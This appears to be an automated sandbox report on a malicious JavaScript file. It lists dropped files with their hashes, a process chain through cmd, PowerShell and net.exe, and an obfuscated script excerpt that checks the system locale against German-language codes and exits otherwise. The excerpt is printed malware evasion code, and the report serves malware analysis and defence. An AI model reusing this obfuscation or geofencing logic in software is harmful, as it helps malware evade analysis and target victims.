File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.665748806121931 |
Encrypted: | false |
SSDEEP: | 24:Yv6XrEEzvepamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSj:YvgjyBgkDMUJUAh8cvMj |
MD5: | 222DCCBD95D64D8CB33C7997DE4B0E8E |
SHA1: | 067B0D3AF8F00D50F7C9C057968E2E4FE85EDE0D |
SHA-256: | 6B992F0375EA381D8AF31797E243422D7BDD52E47C8442281B9F4BBFDDDD599F |
SHA-512: | 2657B6A6CFBF6C5916396A7CCBB721B2E65FAC88E56D4A4561ED071BD660FE590EDC9BE5A9450784B658E6E34F44EFFD50F1772B7DDB48DF351B26EC179D7408 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.275795616242127 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJfshHHrPeUkwRe9:YvXKXTPEEZc0vegpGUUUkee9 |
MD5: | DFF0457103F26BE63858FD2C3059E592 |
SHA1: | AE61801EC8C970F01C968F7E6D9A95EE3C98BE3E |
SHA-256: | A8C557381FA14F1CEB277BB7BD55B129BACDFC14B67E272F92874773F79A6141 |
SHA-512: | 4750F3A4BE7EEAE48073266FEC6D300063BB68B606FE75627E054BFF80903427C666218E59F79C74FBC39FA4B87DEBC01C7CACD2231B3819D374D6D542AB88F9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.283482174662939 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX+8XPE9VoZcg1vRcR0YXgGDoAvJTqgFCrPeUkwRe9:YvXKXTPEEZc0vegpGTq16Ukee9 |
MD5: | 0231653F1606E88171CA4973A1C129EA |
SHA1: | 8EE2E8DFA56C462E09B5D5A0A04429C0ABAA3D3A |
SHA-256: | DEBC47B992E99130695CA139E5074567E216025A8FD66641D2264B6F34D66243 |
SHA-512: | 7481FC9F1D190D1CAEFCA6F151E8052133048CFA1F925B5716631CF05DDDA21C3B504F0D8462FE9FF5A0EAAA80A14D172E5738630483D83C7E9AC8E3C892313B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.140890925635523 |
Encrypted: | false |
SSDEEP: | 48:YjFgpicaYDPmz0i1HtpLRGo9fnXFM8vY0Fsu8/9Nl1/8:+uIcaYDPmz0i1NpLRGK1hvVFsxNb/8 |
MD5: | A7FFF3234ACC6B352A4E93B3AFC25590 |
SHA1: | BE1CD0A69FEE8244B139E10451D458AA30FEB340 |
SHA-256: | AD82C44BC697F00E5FA0C96A9D5F3D52FBCA057B2FB87B0A31F9B8716415039B |
SHA-512: | 041C024F67CFD87136FD254E1952D7A9B36355000BB9B5A766021D877250A672909E9C7998A1EAF9BF7B6D532B11533E2D78A39FC1A1432F4399EE3E43D97944 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1882163559295305 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msEHUUUUUUUUNSvR9H9vxFGiDIAEkGVvp9:lNVmswUUUUUUUUN+FGSIt5 |
MD5: | FEECD4A81440FCD7E9FAB33E343686F8 |
SHA1: | 70BDE414C5F209C864F17E51CAB0407A0688EBBD |
SHA-256: | CA67EE83781728206B8DDE97BE6AD33E6908B893FB49F0E0F63837894C286D85 |
SHA-512: | D979D7B7972497AFB66AA6644F5A0FE9FD75F68A150BECF4C18FCD68D47291ECF41BF80E30A9E46C25BB157A3A0633517A24123669C3F012EDC2BAE9EE44F2C7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.6045894544248374 |
Encrypted: | false |
SSDEEP: | 48:7McigKUUUUUUUUUU1vR9H9vxFGiDIAEkGVvhqFl2GL7msS:7biHUUUUUUUUUUxFGSItzKVmsS |
MD5: | EB44CD669EA0C9BB628F06DFBE0C2DC3 |
SHA1: | 70017FBF71310624B450CC69921AF19107DD8CE4 |
SHA-256: | 0E9B755B3CA9289820616EFAA690A785A22F286962D59B2641A36051F8D2FD64 |
SHA-512: | B5B5350A082B73AFF684E2109D3D4EDA0E5C7E491285758B7FFD1AFEAC9CF128993DA4DC2808E8710FA3EDDCC73702E73E145CD060915C9A2A535DA3907B8ECE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgyVdp5k9zaAXrhJg39zafVWtWYyu:6a6TZ44ADEydp5k9zVhOafNK |
MD5: | 4C0DE42B8B4E0AE8978D65412952BE09 |
SHA1: | 3C3DBF498394CCAEA5AEA878C9C89F4A232E7D58 |
SHA-256: | DDFDD2141B6218D68AFD2A0ED6F0645671084802BE6136A7D85B461DE0303CB5 |
SHA-512: | 695A9C0992CFBA463866CD11EC036B57429206E4980939577425ABB0A36355F4424179C0B0A7337426390B0CE7D093C8669175801D9BA49A4ACB5B8152B6214F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulVmdtZ:NllUM |
MD5: | 013016A37665E1E37F0A3576A8EC8324 |
SHA1: | 260F55EC88E3C4D384658F3C18C7FDEF202E47DD |
SHA-256: | 20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8 |
SHA-512: | 99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.4965336456103326 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClhYH:Qw946cPbiOxDlbYnuRK+bcYH |
MD5: | 48CE59EDD22DC7E765D11799A9748C89 |
SHA1: | FD4044044AFAE2C513264197757C7C4A5D4A77A3 |
SHA-256: | B3BF7F9B968ECE4F58017779CD154D30DC741C680E29DE2D7B1965AEF17C2D87 |
SHA-512: | 93C032E8A4547D149A839858BE9D926D4AC3D9AE395BA668F8BE9940F8CCEB31866783E035BA52B219B35789C6DD339B061C33950D22338756103B79BCC1211A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 22-06-45-274.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.345946398610936 |
Encrypted: | false |
SSDEEP: | 384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW |
MD5: | 8947C10F5AB6CFFFAE64BCA79B5A0BE3 |
SHA1: | 70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778 |
SHA-256: | 4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485 |
SHA-512: | B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.372364137681445 |
Encrypted: | false |
SSDEEP: | 384:CmMmVnVJVIVhTVxsmhtCDHyKGKNxu7d7nCCGkg8SpVxnS2PuxBHwdDg6vmGSIxoe:TZnGXT7dZI |
MD5: | 534425E72868C3DD35A834DCD931FB2F |
SHA1: | 18C9932E88360ED54FB678CEE38861E819B2CBDE |
SHA-256: | 598946732EC9857C42BD98C34CE81C75F993385441722FA92F480B7DB2B3D4D4 |
SHA-512: | 608297694027A4500D1EFC22E2E1EB13195DBD4DBCBCAA55B74987DB2FEC972B715783E9E8D27603918925B42F39FB1A4DCAED6495D81437C0E64EB256E30984 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.389444619225165 |
Encrypted: | false |
SSDEEP: | 768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r0:b0 |
MD5: | 44CAB3FC523AF8F627044E8D83FB8D7F |
SHA1: | 05175178AE656DE57B45AEF5D4A18B6A3A9A45A2 |
SHA-256: | 899A2B410D52B937283709107103F333870E3707FF947949FF2D45F5A8914851 |
SHA-512: | 09F49ABF842BA777691006EFD0D408567162760030E29D67B1C42FF9ADC69B3519D9988C15A63F115812E6CF61EE0D6577B6825E0836E26660766D053928BC3A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru |
MD5: | 18E3D04537AF72FDBEB3760B2D10C80E |
SHA1: | B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC |
SHA-256: | BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4 |
SHA-512: | 2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje |
MD5: | 716C2C392DCD15C95BBD760EEBABFCD0 |
SHA1: | 4B4CE9C6AED6A7F809236B2DAFA9987CA886E603 |
SHA-256: | DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8 |
SHA-512: | E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.928708680733038 |
TrID: | |
File name: | 2812430594697516427.js |
File size: | 18'973 bytes |
MD5: | 2037767d955828e6d33d4d28d122e586 |
SHA1: | e22cc057d663eb4cee426a128626bbced9e0bb92 |
SHA256: | bb2f99fc208f820603fbfa1464c5504ba7237ce55537f878cd3a1f29d9f4ce0e |
SHA512: | df666828c43f67868082593ce014ad00602c31ddc6b55530f5db37d02ff2a125dbc5ad141da3926a8d966d2503e7633c98963eba748b882002044aa4660ace3b |
SSDEEP: | 384:CaKqxxxxxLAI74V64mkiDOg+XLTS/eABmTySYp7Rkyq:CaMIr4mkiDIu/3BgyHRkyq |
TLSH: | D68283C4C1561B1F84D8A9C1DA63887693E8678ECA1944DCED0DB0DA9D67E30BBE01F7 |
File Content Preview: | function cahhv(){zzgosduk=[1031,3079,5127,4103,2055,3072];var bverovtc=this[fzzeuk+hndcghhma+yibntkcg+jcduebba+useli+ulfbgcyi+gaggurigg+juhyvx](this[mrxdjzy+clycvi+vvtpo+yibntkcg+hithm+fzzeuk+juhyvx][naitrjtq+yibntkcg+useli+hndcghhma+juhyvx+useli+emzuhbu+ |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 22:06:36 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff72e160000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 22:06:37 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c9ba0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 22:06:37 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 22:06:37 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 22:06:41 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 22:06:42 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c9ba0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 22:06:42 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6ea1e0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 22:06:42 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 22:06:42 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eef20000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 22:06:43 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function cahhv() { |
|
1 | zzgosduk = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var bverovtc = this[fzzeuk + hndcghhma + yibntkcg + jcduebba + useli + ulfbgcyi + gaggurigg + juhyvx] ( this[mrxdjzy + clycvi + vvtpo + yibntkcg + hithm + fzzeuk + juhyvx][naitrjtq + yibntkcg + useli + hndcghhma + juhyvx + useli + emzuhbu + zkoio + xygykzl + useli + vvtpo + juhyvx] ( mrxdjzy + clycvi + vvtpo + yibntkcg + hithm + fzzeuk + juhyvx + kxxfrdr + clycvi + eakdilx + useli + xqtgeumxx + xqtgeumxx ) [qivhgnib + useli + dedsbjcet + qivhgnib + useli + hndcghhma + tinlblncr] ( sgsgfg + psrxusxk + qlwdedvk + itfpszi + cpbfqmt + naitrjtq + hwdjgt + qivhgnib + qivhgnib + qlwdedvk + urzzh + znrtw + cpbfqmt + hwdjgt + clycvi + qlwdedvk + qivhgnib + zqaqokaw + naitrjtq + ownhpz + gaggurigg + juhyvx + yibntkcg + ownhpz + xqtgeumxx + bsrcqdnjb + njmarkjd + hndcghhma + gaggurigg + useli + xqtgeumxx + zqaqokaw + ulfbgcyi + gaggurigg + juhyvx + useli + yibntkcg + gaggurigg + hndcghhma + juhyvx + hithm + ownhpz + gaggurigg + hndcghhma + xqtgeumxx + zqaqokaw + shmjithgx + ownhpz + vvtpo + hndcghhma + xqtgeumxx + useli ), 16 ); |
|
3 | for ( ltxlksed = 0 ; ltxlksed < zzgosduk[xqtgeumxx + useli + gaggurigg + dedsbjcet + juhyvx + eakdilx] ; ++ ltxlksed ) | |
4 | { | |
5 | if ( bverovtc == zzgosduk[ltxlksed] ) | |
6 | { | |
7 | bverovtc = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( bverovtc !== true ) | |
12 | this[mrxdjzy + clycvi + vvtpo + yibntkcg + hithm + fzzeuk + juhyvx][hgofif + icqrtpjl + hithm + juhyvx] ( ); | |
